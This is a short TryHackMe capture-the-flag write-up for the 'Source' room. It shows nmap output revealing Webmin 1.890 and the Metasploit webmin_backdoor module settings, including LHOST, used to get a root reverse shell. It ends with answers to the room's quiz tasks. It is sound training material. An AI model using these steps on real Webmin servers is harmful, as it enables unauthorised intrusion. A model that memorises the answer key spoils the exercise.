AttackerKB & Source - Tryhackme writeup



Hi guys, today I will show you how easy this boxes are in a very simple explanation both AttackerKD&Source.


1 - Enumeration
2 - Exploitation
3- Reverse shell
4-AttackerKB Tasks

Enumeration


Nmap -T4 -A -v -Pn $IP

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
| 2048 b7:4c:d0:bd:e2:7b:1b:15:72:27:64:56:29:15:ea:23 (RSA)
| 256 b7:85:23:11:4f:44:fa:22:00:8e:40:77:5e:cf:28:7c (ECDSA)
|_ 256 a9:fe:4b:82:bf:89:34:59:36:5b:ec:da:c2:d3:95:ce (ED25519)
10000/tcp open http MiniServ 1.890 (Webmin httpd)

Exploitation


One of the attached files of vulnerability is metasploit module that will allow us reverse shell the box so let open Metasploit:


run msfconsole. Then search "the exploit name or version"









Then choose unix/webapp/webmin_backdoor

Then: RHOSTS : $IP
RPORT: Box-port
LHOST: Your-ip
SSL : 1

Reverse shell


Run the exploit and you'll get a shell.
Voila session opened we are root so let check the hints and hunt the flags.

User flag:







Root flag:




Task 2 - Discovering the lay of the land:

From Nmap results we can find all our answers...

Answers:
#2-Webmin
#3-1.890
#4- from cert bellow figure it out 

Task 3 - Learning to fly:

Just explore AttackerHB then we will be able to answer the following "important to copy directly from AttackerKB site"

Answers:

#3 1.890 
#4 supply chain 
#5 aug172019 
#6 githubfileinthetitle

Thank you! for all...

Comments here, cracks!

Post a Comment

Comments here, cracks!

Post a Comment (0)

Previous Post Next Post